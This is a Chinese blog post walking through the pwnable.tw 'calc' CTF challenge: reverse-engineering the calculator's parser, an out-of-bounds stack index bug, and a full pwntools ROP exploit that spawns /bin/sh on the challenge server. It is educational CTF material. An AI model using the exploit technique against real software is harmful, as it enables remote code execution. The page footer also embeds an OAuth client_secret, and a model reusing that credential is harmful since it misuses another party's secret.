<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="题目难度一下子变大了，光是看算法我就看了一天，漏洞也是看了别人的wp才找出来的，累。那就首先来分析伪代码吧。    分析calc函数里面重要的函数就是这三个：get_expr()，init_pool()，parse_expr()。get_expr()：对输入的表达式进行处理，过滤掉除了数字和加减乘除以外的字符后放入input所在的栈上，最大size可以到达0x400。init_pool()：对ar">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwnable.tw calc">
<meta property="og:url" content="http://yaqing.site/2018/08/22/20180822/index.html">
<meta property="og:site_name" content="洋葱">
<meta property="og:description" content="题目难度一下子变大了，光是看算法我就看了一天，漏洞也是看了别人的wp才找出来的，累。那就首先来分析伪代码吧。    分析calc函数里面重要的函数就是这三个：get_expr()，init_pool()，parse_expr()。get_expr()：对输入的表达式进行处理，过滤掉除了数字和加减乘除以外的字符后放入input所在的栈上，最大size可以到达0x400。init_pool()：对ar">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fua896e8l5j20ou0cijru.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fua88kffywj20w30abq39.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fublzllrh3j21hc0svtaw.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fubm9v5i3wj21hb0mwgn5.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fubmj2se8uj20nw0f8jrx.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fubmsq4kv4j20xq0j2gmq.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fuh338ulaij20w20f8gm6.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fuh2c3pq1ej20kf02wt8j.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fuci9l6dlcj20vh06uglx.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fuh3d348x0j20dc03e74x.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fuh40h04nbj20g901sdfn.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fuh53esm91j20bz052aai.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fuh559yhq7j20cl02vt8y.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fuh560magfj20b001kdg8.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fuh56ztaovj20sw03bglk.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fuh5a2tqjlj20c1042aab.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/72105478gy1fuht07qj9aj20px0llq3x.jpg">
<meta property="og:updated_time" content="2018-08-23T02:05:41.545Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Pwnable.tw calc">
<meta name="twitter:description" content="题目难度一下子变大了，光是看算法我就看了一天，漏洞也是看了别人的wp才找出来的，累。那就首先来分析伪代码吧。    分析calc函数里面重要的函数就是这三个：get_expr()，init_pool()，parse_expr()。get_expr()：对输入的表达式进行处理，过滤掉除了数字和加减乘除以外的字符后放入input所在的栈上，最大size可以到达0x400。init_pool()：对ar">
<meta name="twitter:image" content="http://ww1.sinaimg.cn/large/72105478gy1fua896e8l5j20ou0cijru.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yaqing.site/2018/08/22/20180822/"/>





  <title>Pwnable.tw calc | 洋葱</title>
  








</head>
    
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">洋葱</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">懒散的小菜鸟。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yaqing.site/2018/08/22/20180822/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="洋葱">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="洋葱">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Pwnable.tw calc</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-08-22T00:17:30+08:00">
                Aug 22 2018
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2018/08/22/20180822/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count gitment-comments-count" data-xid="/2018/08/22/20180822/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2018/08/22/20180822/" class="leancloud_visitors" data-flag-title="Pwnable.tw calc">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1,425 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  6 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>题目难度一下子变大了，光是看算法我就看了一天，漏洞也是看了别人的<code>wp</code>才找出来的，累。那就首先来分析伪代码吧。   </p>
<h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><p><code>calc</code>函数里面重要的函数就是这三个：<code>get_expr()</code>，<code>init_pool()</code>，<code>parse_expr()</code>。<br><img src="http://ww1.sinaimg.cn/large/72105478gy1fua896e8l5j20ou0cijru.jpg" alt=""><img src="http://ww1.sinaimg.cn/large/72105478gy1fua88kffywj20w30abq39.jpg" alt=""><code>get_expr()</code>：对输入的表达式进行处理，过滤掉除了数字和加减乘除以外的字符后放入<code>input</code>所在的栈上，最大size可以到达<code>0x400</code>。<br><code>init_pool()</code>：对<code>array</code>这个数组进行初始化，这个数组等下要放操作数。<br>至于<code>parse_expr()</code>函数：<br><img src="http://ww1.sinaimg.cn/large/72105478gy1fublzllrh3j21hc0svtaw.jpg" alt=""><img src="http://ww1.sinaimg.cn/large/72105478gy1fubm9v5i3wj21hb0mwgn5.jpg" alt="">大致逻辑如下：将输入的表达式放入一个<code>for</code>循环，如果是操作数的话就<code>continue</code>，如果说是表达式的话就进入<code>if</code>。<br><a id="more"></a><br><img src="http://ww1.sinaimg.cn/large/72105478gy1fubmj2se8uj20nw0f8jrx.jpg" alt="">上面截图的第一个红框和第三个红框做的操作是把每一次运算符旁边的数字放入<code>left_num</code>这个字符串中，然后再通过<code>atoi</code>函数转换为<code>int</code>类型的<code>left_number</code>；中间第二个红框做的操作是把<code>left_number</code>通通都放入<code>number</code>这个数组里，但是需要注意的是，<code>number</code>数组是从<code>number[1]</code>开始存放操作数的，<code>*number</code>（也就是<code>number[0]</code>)是在计数，计算操作数的个数。<br><img src="http://ww1.sinaimg.cn/large/72105478gy1fubmsq4kv4j20xq0j2gmq.jpg" alt="">这一段的逻辑其实就已经在把操作数和运算符弄进<code>eval</code>函数进行运算了，要注意的是，带入<code>eval</code>函数的操作符并不是当前的操作符，而是前一个，配合着<code>eval</code>函数一起看：<img src="http://ww1.sinaimg.cn/large/72105478gy1fuh338ulaij20w20f8gm6.jpg" alt="">比如：<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line"><span class="comment">//1+2+3：当i=1的时候，这时候opr[0]=0，所以把'+'放入opr[0]中；</span></div><div class="line"><span class="comment">//当i=3的时候，运算符又为'+'，这次就执行eval(number,opr[0]);opr[0]='+'，number[2]=number[2]+number[3]</span></div><div class="line"></div><div class="line">number[<span class="number">0</span>]=<span class="number">3</span>,number[<span class="number">1</span>]=<span class="number">1</span>,number[<span class="number">2</span>]=<span class="number">2</span>,number[<span class="number">3</span>]=<span class="number">3</span>;</div><div class="line">opr[<span class="number">0</span>]=<span class="string">'+'</span>;</div><div class="line"></div><div class="line"><span class="comment">//1+2*3：当i=1的时候，这时候opr[0]=0，所以把'+'放入opr[0]中；</span></div><div class="line"><span class="comment">//当i=3的时候，运算符为'*'，这次就执行opr[1]='*'</span></div><div class="line"></div><div class="line">number[<span class="number">0</span>]=<span class="number">3</span>,number[<span class="number">1</span>]=<span class="number">1</span>,number[<span class="number">2</span>]=<span class="number">2</span>,number[<span class="number">3</span>]=<span class="number">3</span>;</div><div class="line">opr[<span class="number">0</span>]=<span class="string">'+'</span>,opr[<span class="number">1</span>]=<span class="string">'*'</span></div></pre></td></tr></table></figure></p>
<h3 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h3><p>分析到这里差不多了，最后还有一个<code>while</code>循环对操作数进行计算，这个函数就差不多分析完了。反正我分析到这里也没有找到洞在哪里，看了别人的<code>wp</code>才知道有洞。<br>我们假设，如果输入的表达式不是正常的呢？假设我们输入<code>+100</code>，按照程序的逻辑走一遍，第一个输入就是运算符，那么就进入循环，但是循环在这一步，是直接跳过的。<br><img src="http://ww1.sinaimg.cn/large/72105478gy1fuh2c3pq1ej20kf02wt8j.jpg" alt=""><br>在把<code>+</code>保存在<code>opr[]</code>之后，在后面循环的时候会把100放在<code>number[1]</code>中，此时<code>number[0]</code>等于1，在后面进入<code>eval</code>函数的时候，<code>number[0]=number[0]+number[1]</code>，然后再自减，也就是最终<code>number[0]=100</code>。<br><img src="http://ww1.sinaimg.cn/large/72105478gy1fuci9l6dlcj20vh06uglx.jpg" alt="">可以看到，最终打印出来的值是<code>number[number[0]]</code>，也就是<code>number[100]</code>，我们打印出来的值就是<code>number[100]</code>，换而言之，泄露出了<code>ebp-53C</code>的值。试一下：<br><img src="http://ww1.sinaimg.cn/large/72105478gy1fuh3d348x0j20dc03e74x.jpg" alt="">发现并没有泄露出地址，这是因为，在刚开始的时候，我们对表达式进行清零，<code>input</code>是从<code>0x40C</code>到<code>0xC</code>，<br><img src="http://ww1.sinaimg.cn/large/72105478gy1fuh40h04nbj20g901sdfn.jpg" alt=""><br>如果我们修改<code>0xC</code>的值，就会发现就该成功。<br><img src="http://ww1.sinaimg.cn/large/72105478gy1fuh53esm91j20bz052aai.jpg" alt=""><br>那么我们就可以修改返回地址，因为返回地址刚好在下面，也就是<code>number[357+4]</code>的位置。我们来验证一下<code>number[361]</code>的值：<br><img src="http://ww1.sinaimg.cn/large/72105478gy1fuh559yhq7j20cl02vt8y.jpg" alt=""><img src="http://ww1.sinaimg.cn/large/72105478gy1fuh560magfj20b001kdg8.jpg" alt=""><img src="http://ww1.sinaimg.cn/large/72105478gy1fuh56ztaovj20sw03bglk.jpg" alt=""><br>可以看到我们的验证是正确的，那么接下来，就是利用的问题了。</p>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>如上所述，我们可以进行栈溢出利用了。<br><img src="http://ww1.sinaimg.cn/large/72105478gy1fuh5a2tqjlj20c1042aab.jpg" alt=""><br>但是本身题目开了<code>NX</code>，无法直接在栈上写<code>shellcode</code>，也没有函数让我们直接利用，所以就要用到<code>ROP</code>来执行<code>execve(&quot;/bin/sh&quot;)</code>吧。具体关于<code>ROP</code>的复习<a href="http://yaqing.site/2018/08/03/20180803/">点这里</a>，我们要做的利用就是先泄露出地址然后修改地址。这里对于我来说比较难的地方是计算<code>addr of &quot;/bin/sh&quot;</code>的地址，看了很多<code>wp</code>后发现一个最简单的办法就是画图，通过<code>gdb</code>调试我们可以很容易的计算出<code>main</code>的基地址（<code>ebp</code>)和返回地址的差值是<code>0x1c</code>（这个差值是固定的），也就是7个字节，然后通过画图：<img src="http://ww1.sinaimg.cn/large/72105478gy1fuht07qj9aj20px0llq3x.jpg" alt="">这样就很容易的看出来<code>&quot;/bin/sh&quot;</code>的位置刚好是在基地址下面的一个栈单元上。<br><figure class="highlight py"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#eax:0xb</span></div><div class="line"><span class="comment">#ebx:addr of "/bin/sh"</span></div><div class="line"><span class="comment">#ecx:0</span></div><div class="line"><span class="comment">#edx:0</span></div><div class="line"><span class="comment">#stack </span></div><div class="line">pop eax,ret    (ret)</div><div class="line"><span class="number">0xb</span></div><div class="line">pop ecx ; pop ebx ; ret</div><div class="line"><span class="number">0x0</span></div><div class="line">addr of <span class="string">"/bin/sh"</span></div><div class="line">pop edx,ret</div><div class="line"><span class="number">0x0</span></div><div class="line">int <span class="number">0x80</span></div><div class="line">/bin</div><div class="line">/sh\<span class="number">0</span></div></pre></td></tr></table></figure></p>
<p>其他的不需要注意，要注意的是<code>/bin/sh</code>的地址，由于我们是写到栈上去的，所以我们要计算出地址。</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *       </div><div class="line"></div><div class="line"><span class="comment">#context.log_level="debug"</span></div><div class="line">stack=[<span class="number">0x0805c34b</span>, <span class="number">11</span>, <span class="number">0x080701d1</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x080701aa</span>, <span class="number">0x0</span>, <span class="number">0x08049a21</span>, <span class="number">0x6e69622f</span>, <span class="number">0x0068732f</span>]</div><div class="line">z=<span class="number">361</span></div><div class="line">pro=remote(<span class="string">"chall.pwnable.tw"</span>,<span class="number">10100</span>)</div><div class="line"><span class="comment">#pro=process("./calc")</span></div><div class="line"></div><div class="line"><span class="comment">#ROPgadget --binary calc --ropchain</span></div><div class="line">chain=[<span class="number">0x080701aa</span>,<span class="number">0x080ec060</span>,<span class="number">0x0805c34b</span>,u32(<span class="string">"/bin"</span>),<span class="number">0x0809b30d</span>,<span class="number">0x080701aa</span>,<span class="number">0x080ec064</span></div><div class="line">,<span class="number">0x0805c34b</span>,u32(<span class="string">"/sh\0"</span>),<span class="number">0x0809b30d</span>,<span class="number">0x080701aa</span> ,<span class="number">0x080ec068</span> ,<span class="number">0x080550d0</span> ,<span class="number">0x0809b30d</span></div><div class="line">,<span class="number">0x080481d1</span> ,<span class="number">0x080ec060</span> ,<span class="number">0x080701d1</span> ,<span class="number">0x080ec068</span> ,<span class="number">0x080ec060</span> ,<span class="number">0x080701aa</span></div><div class="line">,<span class="number">0x080ec068</span> ,<span class="number">0x080550d0</span> ,<span class="number">0x0807cb7f</span> ,<span class="number">0x0807cb7f</span> ,<span class="number">0x0807cb7f</span> ,<span class="number">0x0807cb7f</span></div><div class="line">,<span class="number">0x0807cb7f</span> ,<span class="number">0x0807cb7f</span> ,<span class="number">0x0807cb7f</span> ,<span class="number">0x0807cb7f</span> ,<span class="number">0x0807cb7f</span> ,<span class="number">0x0807cb7f</span></div><div class="line">,<span class="number">0x0807cb7f</span> ,<span class="number">0x08049a21</span>] </div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">send_code</span><span class="params">(p,q)</span>:</span></div><div class="line">	pro.recvuntil(<span class="string">"===\n"</span>)</div><div class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(p,q):</div><div class="line">		shellcode=<span class="string">"+"</span>+str(z+i)</div><div class="line">		pro.sendline(shellcode)</div><div class="line">		data=int(pro.recvline())</div><div class="line">		<span class="keyword">if</span> data&lt;<span class="number">0</span>:</div><div class="line">			x=<span class="string">"+"</span>+str(z+i)+str(data)</div><div class="line">		<span class="keyword">else</span>:</div><div class="line">			x=<span class="string">"+"</span>+str(z+i)+<span class="string">"-"</span>+str(data)</div><div class="line">		pro.sendline(x)</div><div class="line">		<span class="keyword">print</span> <span class="string">"set_zero %d: "</span>%i,pro.recv()</div><div class="line">		shellcode=<span class="string">"+"</span>+str(z+i)+<span class="string">"+"</span>+str(chain[i])</div><div class="line">		pro.sendline(shellcode)</div><div class="line">		data=int(pro.recv())</div><div class="line">		<span class="keyword">print</span> <span class="string">"chain[%d]"</span>%i,hex(chain[i])</div><div class="line">		<span class="keyword">print</span> <span class="string">"shellcode:"</span>,shellcode</div><div class="line">		<span class="keyword">print</span> <span class="string">"send_code:"</span>,hex(data)</div><div class="line">	pro.interactive()</div><div class="line"></div><div class="line"></div><div class="line"><span class="comment">#stack=data-x</span></div><div class="line"><span class="comment">#x=data1-stack</span></div><div class="line"><span class="comment">#stack=data-(data1-stack) </span></div><div class="line"><span class="comment">#stack=data-data1+stack</span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">change</span><span class="params">(p,q)</span>:</span></div><div class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(p,q):</div><div class="line">		shellcode=<span class="string">"+"</span>+str(z+i)</div><div class="line">		pro.sendline(shellcode)</div><div class="line">		data=int(pro.recvline())</div><div class="line">		<span class="keyword">if</span> data&lt;<span class="number">0</span>:</div><div class="line">			x=<span class="string">"+"</span>+str(z+i)+str(data)+<span class="string">"+"</span>+str(stack[i])</div><div class="line">		<span class="keyword">else</span>:</div><div class="line">			x=<span class="string">"+"</span>+str(z+i)+<span class="string">"-"</span>+str(data)+<span class="string">"+"</span>+str(stack[i])</div><div class="line">		pro.sendline(x)</div><div class="line">		pro.recv()</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></div><div class="line">	size=len(chain)</div><div class="line">	send_code(<span class="number">0</span>,size)</div><div class="line"></div><div class="line"><span class="string">"""</span></div><div class="line">def main():</div><div class="line">	pro.recvuntil("===\n")</div><div class="line">	change(0,6)</div><div class="line"></div><div class="line">	print "*********************"</div><div class="line">	pro.sendline("+360")</div><div class="line">	esp=pro.recv()</div><div class="line">	tmp=(0-int(esp))-4</div><div class="line">	print "tmp: ",tmp</div><div class="line">	shellcode="+365"</div><div class="line">	pro.sendline(shellcode)</div><div class="line">	x=int(pro.recv())</div><div class="line">	print "x: ",x</div><div class="line">	shellcode="+365"+"-"+str(tmp)</div><div class="line">	pro.sendline(shellcode)</div><div class="line">	data=pro.recv()</div><div class="line">	print "data: ",int(data)</div><div class="line">	print "*********************"</div><div class="line"></div><div class="line">	change(5,10)</div><div class="line">	pro.interactive()</div><div class="line">"""</div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ ==<span class="string">"__main__"</span>:</div><div class="line">	main()</div></pre></td></tr></table></figure>
      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div></div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="http://osuzegp2h.bkt.clouddn.com/wechatpay.jpg" alt="洋葱 微信支付"/>
        <p>微信支付</p>
      </div>
    

    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/08/13/20180813/" rel="next" title="Pwnable.tw orw">
                <i class="fa fa-chevron-left"></i> Pwnable.tw orw
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/08/24/20180824/" rel="prev" title="C语言之指针相关的小问题">
                C语言之指针相关的小问题 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      
        <div id="gitment-container"></div>
      
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">洋葱</p>
              <p class="site-description motion-element" itemprop="description">想学做菜或者化妆的话请关注我的微信公众号：REup5hare。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">33</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#分析"><span class="nav-number">1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞"><span class="nav-number">2.</span> <span class="nav-text">漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用"><span class="nav-number">3.</span> <span class="nav-text">利用</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">洋葱</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  







<!-- LOCAL: You can save these files to your site and update links -->
    
        
        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
    
<!-- END LOCAL -->

    

    
      <script type="text/javascript">
      function renderGitment(){
        var gitment = new Gitmint({
            id: window.location.pathname, 
            owner: 'jocelyn771120',
            repo: 'BlogComments',
            
            lang: "" || navigator.language || navigator.systemLanguage || navigator.userLanguage,
            
            oauth: {
            
            
                client_secret: '69ac6d02b51c77bd8b195113b8ce774d8c8329ca',
            
                client_id: 'eedfad4bcba4b4601384'
            }});
        gitment.render('gitment-container');
      }

      
      renderGitment();
      
      </script>
    





  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
